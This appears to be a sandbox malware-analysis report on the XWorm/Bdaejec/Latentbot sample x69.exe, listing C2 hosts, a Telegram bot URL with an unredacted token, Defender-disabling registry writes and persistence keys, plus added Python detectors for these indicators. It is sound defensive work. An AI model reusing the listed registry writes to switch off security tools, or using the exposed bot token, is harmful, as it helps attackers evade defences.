Resubmissions
22/05/2025, 12:12 | 250522-pc961stjt7 | score 10
22/05/2025, 12:11 | 250522-pcnysatjt2 | score 10
20/05/2025, 04:12 | 250520-eskwysbl9t | score 10

Analysis
max time kernel: 150s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20250502-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
submitted: 20/05/2025, 04:12
Static task: static1
Behavioral task: behavioral1
Sample: x69.exe
Resource: win10v2004-20250502-en

General
Target: x69.exe
Size: 285KB
MD5: 20841606ce69632f258221219aeee09b
SHA1: b72918797186774598792c47b66d5857be59f576
SHA256: 1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83
SHA512: aa1d6dcc49a66a5cef5fc64cae299c250bb5327d8d2e985db83e568b9d5acdde3b58249797f84fddcabf21210e194fa2ae3ca6b178286a3563d9574937e2b72e
SSDEEP: 6144:3RIUGV77XEc5EDEhp19jyVyFSXnIHq1h8tkEsjuIMN9lLk:uUG5oc5EDAU0F+18guI
Malware Config

Extracted: xworm
Version: 3.1
C2: grayhatgroupontop.zapto.org:1177
Install_directory: %AppData%
install_file: USB.exe
telegram: https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004

Extracted: bdaejec
C2: ddos.dnsnb8.net

Extracted: latentbot
C2: grayhatgroupontop.zapto.org

The telegram value is the operator's notification endpoint (a Telegram Bot API token plus the chat_id that receives new-victim messages). The latentbot extraction reports the same host as the XWorm C2. zapto.org is a dynamic-DNS domain, so the address it resolved to during this run is not a stable indicator: block and hunt on the hostname and on the bot/chat identifiers, not on the IP.
Signatures

Bdaejec family

Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource | yara_rule
behavioral1/files/0x000b000000023f92-82.dat | disable_win_def
Detect Xworm Payload 2 IoCs
resource | yara_rule
behavioral1/files/0x000800000001e6cd-22.dat | family_xworm
behavioral1/memory/464-25-0x0000000000FE0000-0x0000000000FF8000-memory.dmp | family_xworm
PID 464 is the first dropped x69.exe instance listed under "Executes dropped EXE", so the XWorm payload is the dropped x69.exe, not the Bdaejec droppers.
Detects Bdaejec Backdoor. 5 IoCs
Bdaejec is a backdoor written in C++.
resource | yara_rule
behavioral1/memory/4940-568-0x00000000001E0000-0x00000000001E9000-memory.dmp | family_bdaejec_backdoor
behavioral1/memory/1048-569-0x00000000001E0000-0x00000000001E9000-memory.dmp | family_bdaejec_backdoor
behavioral1/memory/1048-1510-0x00000000001E0000-0x00000000001E9000-memory.dmp | family_bdaejec_backdoor
behavioral1/memory/4940-1509-0x00000000001E0000-0x00000000001E9000-memory.dmp | family_bdaejec_backdoor
behavioral1/memory/2956-1511-0x00000000005F0000-0x00000000005F9000-memory.dmp | family_bdaejec_backdoor
PIDs 4940 and 1048 are izTLZKj.exe and PID 2956 is iyMbXS.exe (see "Executes dropped EXE"); these two dropped binaries carry the Bdaejec code.
Latentbot family

Sets Windows Defender DisableAntiSpyware policy 2 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | reg.exe
Current Defender platform builds on Windows 10 and 11 ignore DisableAntiSpyware, so on a patched endpoint this write changes nothing; the write attempt by reg.exe is still a reliable detection signal.
Modifies Windows Defender Real-time Protection settings 3 TTPs 20 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Modifies security service 2 TTPs 2 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
Start = 4 is SERVICE_DISABLED and only takes effect at the next boot. With Tamper Protection enabled, Defender blocks these registry and service changes when they come from an untrusted process such as reg.exe; they succeeded here because the sandbox image is not tamper-protected. Detect on the write attempt (Sysmon Event ID 13 or equivalent EDR registry telemetry on these paths), not on the resulting service state.
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description | pid | Process | procid_target
PID 4192 created 616 | 4192 | powershell.EXE | 5
PID 4348 created 616 | 4348 | powershell.EXE | 5
The same two powershell.EXE instances (4192 and 4348) also appear under "Suspicious use of SetThreadContext" and write to C:\Windows\system32\config\systemprofile, i.e. they run in the SYSTEM profile. Parent spoofing plus SetThreadContext from a SYSTEM-context PowerShell is the pattern of process injection into a freshly created child.
Xworm family

PowerShell execution 44 IoCs
pid | Process
2300, 4980, 4896, 3884, 3736, 2868, 3424, 3572, 1520, 3416, 4888, 4684, 5032, 4684, 2292, 2868, 4676 | powershell.exe
4348 | powershell.EXE
3344, 2268, 3832, 1928, 3288, 1896, 5084, 5052, 964 | powershell.exe
4192 | powershell.EXE
4872, 5032, 4268, 3760, 2020, 5052, 4676, 3564, 4896, 1520, 2260, 2300, 4336, 3572, 3512, 856 | powershell.exe
(PIDs are listed in the order the report gives them; repeated PIDs are repeated IoC entries for the same process.)
Modifies Windows Firewall 2 TTPs 2 IoCs
pid | Process
3708 | netsh.exe
2120 | netsh.exe

ASPack v2.12-2.42 1 IoCs
resource | yara_rule
behavioral1/files/0x000f0000000226f8-50.dat | aspack_v212_v242
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | wmiprvse.exe
Both reads are performed by wmiprvse.exe (the WMI provider host) on behalf of some WMI client; the report does not show which process issued the query, so do not attribute this check to the sample without a matching WMI query in its own activity.
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | x69Disable-winDefender.exe
Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | x69.exe
Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | iyMbXS.exe
Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | izTLZKj.exe
Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | izTLZKj.exe
Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | x69.exe
Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | x69Disable-winDefender.exe
Drops startup file 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk | x69.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk | x69.exe
Executes dropped EXE 11 IoCs
pid | Process
464 | x69.exe
864 | x69.exe
1848 | x69Disable-winDefender.exe
2988 | x69Disable-winDefender.exe
4940 | izTLZKj.exe
1048 | izTLZKj.exe
2524 | x69install.exe
2956 | iyMbXS.exe
3764 | x69install.exe
6132 | x69.exe
2132 | x69.exe
Adds Run key to start application 2 TTPs 4 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" | x69.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" | x69.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69Disable-winDefender = "C:\\Users\\Admin\\AppData\\Roaming\\x69Disable-winDefender.exe" | x69.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69install = "C:\\Users\\Admin\\AppData\\Roaming\\x69install.exe" | x69.exe
All three Run entries point into %AppData% (the Install_directory from the extracted config), so the persistence survives a reboot without admin rights; together with the Startup-folder x69.lnk above this gives the sample two independent user-level autostart paths to clean.
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
30 | ip-api.com
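The extracted config gives two C2 hostnames, the XWorm port and a Telegram Bot API notification URL, and the signature above shows the ip-api.com lookup XWorm performs on check-in. The Python below is an added example, not part of the Triage report or of any tool it mentions: it scans constructed DNS, connection and HTTP log lines, treats the C2 hostnames and the bot/chat identifiers as high-confidence matches, treats the bare port and the ip-api.com lookup as weak, and upgrades the lookup only when the same source also reached a C2 name. The bot token from the report is deliberately replaced by the placeholder REDACTED; matching is done on the bot id and chat_id, which any proxy log carries anyway. The timestamps, source addresses and the 203.0.113.7 destination are constructed.

```python
import re
from dataclasses import dataclass, replace
from typing import List, Optional

# Indicators taken from the extracted config; the bot token itself is not needed to match.
C2_HOSTS = {"grayhatgroupontop.zapto.org", "ddos.dnsnb8.net"}
C2_PORT = 1177
TELEGRAM_BOT_ID = "7717722960"
TELEGRAM_CHAT_ID = "6757433004"
IP_LOOKUP_HOSTS = {"ip-api.com"}

_TG_RE = re.compile(r"api\.telegram\.org/bot(\d+):[\w-]+/sendMessage\?chat_id=(\d+)", re.I)
_URL_HOST_RE = re.compile(r"^[a-z][a-z0-9+.-]*://([^/:?#]+)", re.I)


@dataclass(frozen=True)
class Hit:
    severity: str  # "high" | "medium" | "low"
    src: str
    reason: str


def check_dns(src: str, qname: str) -> Optional[Hit]:
    if qname.lower().rstrip(".") in C2_HOSTS:
        return Hit("high", src, f"DNS query for C2 host {qname}")
    return None


def check_conn(src: str, dst_port: int) -> Optional[Hit]:
    # The C2 name is dynamic DNS, so the port is the only stable transport-level clue; weak alone.
    if dst_port == C2_PORT:
        return Hit("medium", src, f"outbound TCP/{C2_PORT} (XWorm C2 port)")
    return None


def check_http(src: str, url: str) -> Optional[Hit]:
    m = _TG_RE.search(url)
    if m:
        bot_id, chat_id = m.groups()
        if bot_id == TELEGRAM_BOT_ID or chat_id == TELEGRAM_CHAT_ID:
            return Hit("high", src, "Telegram sendMessage to the bot/chat in the extracted config")
        return Hit("low", src, "Telegram Bot API sendMessage (generic)")
    h = _URL_HOST_RE.match(url)
    if h and h.group(1).lower() in IP_LOOKUP_HOSTS:
        return Hit("low", src, "external IP lookup via ip-api.com")
    return None


def scan(log_text: str) -> List[Hit]:
    """Lines are tab-separated: ts, kind, src, then kind-specific fields."""
    hits: List[Hit] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        parts = line.split("\t")
        kind, src = parts[1], parts[2]
        hit = None
        if kind == "dns":
            hit = check_dns(src, parts[3])
        elif kind == "conn":
            hit = check_conn(src, int(parts[4]))
        elif kind == "http":
            hit = check_http(src, parts[3])
        if hit:
            hits.append(hit)
    # Correlation: an IP lookup from a host that also reached a C2 name is part of the check-in.
    c2_sources = {h.src for h in hits if h.severity == "high"}
    return [
        replace(h, severity="medium")
        if h.severity == "low" and h.reason.startswith("external IP") and h.src in c2_sources
        else h
        for h in hits
    ]


# Constructed log: 10.0.0.12 behaves like the infected sandbox host; the others are controls.
SAMPLE_LOG = (
    "1747714320\tdns\t10.0.0.12\tgrayhatgroupontop.zapto.org\n"
    "1747714321\tconn\t10.0.0.12\t203.0.113.7\t1177\n"
    "1747714330\thttp\t10.0.0.12\thttp://ip-api.com/json/\n"
    "1747714331\thttp\t10.0.0.12\thttps://api.telegram.org/bot7717722960:REDACTED/sendMessage?chat_id=6757433004\n"
    "1747714400\tdns\t10.0.0.20\tddos.dnsnb8.net\n"
    "1747714500\thttp\t10.0.0.30\thttps://api.telegram.org/bot1234567890:REDACTED/sendMessage?chat_id=1\n"
    "1747714600\thttp\t10.0.0.40\thttp://ip-api.com/json/\n"
    "1747714700\tdns\t10.0.0.40\twww.example.com\n"
)

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"{h.severity:<6} {h.src:<10} {h.reason}")
```

Run against the constructed log, 10.0.0.12 yields two high hits (C2 name, operator's bot), the port hit and the ip-api.com lookup upgraded to medium; 10.0.0.30's generic Telegram call and 10.0.0.40's lone lookup stay low, which is the behaviour you want before paging anyone on ip-api.com traffic alone.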
Modifies Security services 2 TTPs 8 IoCs
Modifies the startup behavior of a security service.
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" | reg.exe
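The Defender policy writes, the five Wd* service entries set to Start = 4 and the AppData Run keys above are the highest-value host signals in this run, and they map directly onto Sysmon Event ID 13 (registry value set). The Python below is an added example, not part of the Triage report or of any tool it mentions: it folds the report's \REGISTRY\MACHINE form and Sysmon's HKLM form to one path, flags exactly the writes observed here (any Disable* value under the Defender policy key set to 1, a Defender service with Start = 4, a Run entry pointing into AppData) and collapses the doubled reg.exe rows. The event records are constructed to mirror the rows above; the services.exe and gpsvc rows are constructed negatives that must not fire. The ATT&CK IDs are the standard mappings for disabling security tools (T1562.001) and Run-key persistence (T1547.001).

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Hive prefixes as written by the sandbox (\REGISTRY\MACHINE\...) and by
# Sysmon Event ID 13 (HKLM\...); both are folded to the short form.
_HIVE_ALIASES = (
    ("\\registry\\machine\\", "HKLM\\"),
    ("\\registry\\user\\", "HKU\\"),
    ("hkey_local_machine\\", "HKLM\\"),
    ("hkey_users\\", "HKU\\"),
)
# Services the sample set to Start=4 (SERVICE_DISABLED).
DEFENDER_SERVICES = {"windefend", "wdfilter", "wdnisdrv", "wdnissvc", "wdboot"}


@dataclass(frozen=True)
class Finding:
    technique: str  # ATT&CK technique ID
    reason: str
    image: str
    target: str


def normalise_path(path: str) -> str:
    """Fold hive aliases and ControlSetNNN -> CurrentControlSet."""
    low = path.lower()
    for prefix, hive in _HIVE_ALIASES:
        if low.startswith(prefix):
            path = hive + path[len(prefix):]
            break
    return re.sub(r"\\controlset\d{3}\\", lambda _: "\\CurrentControlSet\\", path, flags=re.I)


def parse_int(details: str) -> Optional[int]:
    """Accept the report's "1" and Sysmon's DWORD (0x00000001); None for string data."""
    m = re.search(r"0x([0-9a-f]+)", details, re.I)
    if m:
        return int(m.group(1), 16)
    s = details.strip().strip('"')
    return int(s) if s.isdigit() else None


def classify(target: str, details: str, image: str) -> Optional[Finding]:
    t = normalise_path(target)
    low = t.lower()
    value = parse_int(details)
    # (a) Defender policy override: any Disable* value under the policy key set to 1
    if ("\\policies\\microsoft\\windows defender\\" in low
            and low.rsplit("\\", 1)[-1].startswith("disable") and value == 1):
        return Finding("T1562.001", "Windows Defender policy override", image, t)
    # (b) Defender service disabled via Start=4
    m = re.search(r"\\services\\([^\\]+)\\start$", low)
    if m and m.group(1) in DEFENDER_SERVICES and value == 4:
        return Finding("T1562.001", f"{m.group(1)} service Start=4 (disabled)", image, t)
    # (c) Run-key persistence whose target lives in the user profile's AppData
    if "\\software\\microsoft\\windows\\currentversion\\run\\" in low:
        data = details.strip().strip('"').replace("\\\\", "\\")
        if re.search(r"\\appdata\\(roaming|local)\\", data, re.I):
            return Finding("T1547.001", "Run key pointing into AppData", image, t)
    return None


def triage(events: Iterable[dict]) -> List[Finding]:
    """Classify value-set events; identical hits (the report logs each reg.exe write twice) collapse."""
    out: List[Finding] = []
    for ev in events:
        f = classify(ev["TargetObject"], ev.get("Details", ""), ev["Image"])
        if f and f not in out:
            out.append(f)
    return out


# Constructed events mirroring the report's rows, plus two benign ones that must not fire.
SAMPLE_EVENTS = [
    {"Image": "reg.exe", "TargetObject": r"\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware", "Details": '"1"'},
    {"Image": "reg.exe", "TargetObject": r"\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring", "Details": '"1"'},
    {"Image": "reg.exe", "TargetObject": r"\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring", "Details": '"1"'},
    {"Image": r"C:\Windows\System32\reg.exe", "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\Start", "Details": "DWORD (0x00000004)"},
    {"Image": "reg.exe", "TargetObject": r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start", "Details": '"4"'},
    {"Image": "x69.exe", "TargetObject": r"\REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69", "Details": r'"C:\\Users\\Admin\\AppData\\Roaming\\x69.exe"'},
    {"Image": "services.exe", "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\Start", "Details": "DWORD (0x00000002)"},
    {"Image": "gpsvc", "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware", "Details": "DWORD (0x00000000)"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.technique}  {f.image:<28} {f.reason}: {f.target}")
```

The constructed input produces four T1562.001 findings (policy, real-time monitoring, WinDefend, WdFilter) and one T1547.001 finding; the duplicated DisableRealtimeMonitoring row collapses, and neither the Start = 2 (automatic) write nor the policy value set to 0 fires. Feeding real Sysmon 13 records needs only the TargetObject, Details and Image fields.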
Drops file in System32 directory 12 IoCs
description | ioc | Process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
Only the three powershell.EXE rows are sample-related: they are the SYSTEM-profile artefacts (PowerShell startup profile, CLR usage log) of the two powershell.EXE instances (4192, 4348) seen under the NtCreateUserProcessOtherParentProcess and SetThreadContext signatures. The svchost.exe rows (UpdateOrchestrator tasks, CryptnetUrlCache) and the OfficeClickToRun.exe row are routine OS and Office background activity.
Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 4192 set thread context of 6124 | 4192 | powershell.EXE | 248
PID 4348 set thread context of 2636 | 4348 | powershell.EXE | 249
Drops file in Program Files directory 64 IoCs
description: File opened for modification (all 64 rows)
ioc | Process
C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe | izTLZKj.exe
C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe | izTLZKj.exe
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe | izTLZKj.exe
C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\onenoteshare.exe | izTLZKj.exe
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe | izTLZKj.exe
C:\Program Files\Java\jdk-1.8\bin\wsgen.exe | iyMbXS.exe
C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Microsoft.MicrosoftSolitaireCollection.exe | iyMbXS.exe
C:\Program Files (x86)\Windows Mail\wab.exe | iyMbXS.exe
C:\Program Files\7-Zip\Uninstall.exe | izTLZKj.exe
C:\Program Files\Java\jdk-1.8\bin\jmap.exe | izTLZKj.exe
C:\Program Files\Java\jdk-1.8\bin\wsgen.exe | izTLZKj.exe
C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe | izTLZKj.exe
C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe | izTLZKj.exe
C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE | izTLZKj.exe
C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\MixedRealityPortal.exe | izTLZKj.exe
C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | iyMbXS.exe
C:\Program Files\Java\jdk-1.8\bin\klist.exe | izTLZKj.exe
C:\Program Files\Java\jdk-1.8\bin\javaw.exe | iyMbXS.exe
C:\Program Files\Mozilla Firefox\private_browsing.exe | iyMbXS.exe
C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | iyMbXS.exe
C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe | izTLZKj.exe
C:\Program Files\Java\jre-1.8\bin\keytool.exe | izTLZKj.exe
C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate64.exe | izTLZKj.exe
C:\Program Files\Microsoft Office\root\Integration\Integrator.exe | izTLZKj.exe
C:\Program Files\Microsoft Office\root\Office16\misc.exe | izTLZKj.exe
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe | izTLZKj.exe
C:\Program Files\Mozilla Firefox\pingsender.exe | izTLZKj.exe
C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | izTLZKj.exe
C:\Program Files\7-Zip\7z.exe | izTLZKj.exe
C:\Program Files\Java\jre-1.8\bin\tnameserv.exe | izTLZKj.exe
C:\Program Files\Java\jdk-1.8\bin\ktab.exe | iyMbXS.exe
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOICONS.EXE | iyMbXS.exe
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | iyMbXS.exe
C:\Program Files\Java\jre-1.8\bin\ssvagent.exe | izTLZKj.exe
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe | izTLZKj.exe
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | izTLZKj.exe
C:\Program Files\Java\jdk-1.8\bin\idlj.exe | iyMbXS.exe
C:\Program Files\Java\jdk-1.8\bin\jjs.exe | iyMbXS.exe
C:\Program Files\Java\jre-1.8\bin\kinit.exe | iyMbXS.exe
C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\PeopleApp.exe | iyMbXS.exe
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe | izTLZKj.exe
C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe | izTLZKj.exe
C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.exe | izTLZKj.exe
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | izTLZKj.exe
C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\chrmstp.exe | iyMbXS.exe
C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE | iyMbXS.exe
C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe | izTLZKj.exe
C:\Program Files\Java\jdk-1.8\bin\javac.exe | izTLZKj.exe
C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe | izTLZKj.exe
C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe | izTLZKj.exe
C:\Program Files\Java\jdk-1.8\jre\bin\kinit.exe | izTLZKj.exe
C:\Program Files\Java\jre-1.8\bin\klist.exe | izTLZKj.exe
C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE | izTLZKj.exe
C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE | izTLZKj.exe
C:\Program Files\Java\jdk-1.8\bin\servertool.exe | izTLZKj.exe
C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe | izTLZKj.exe
C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe | izTLZKj.exe
C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | izTLZKj.exe
C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE | izTLZKj.exe
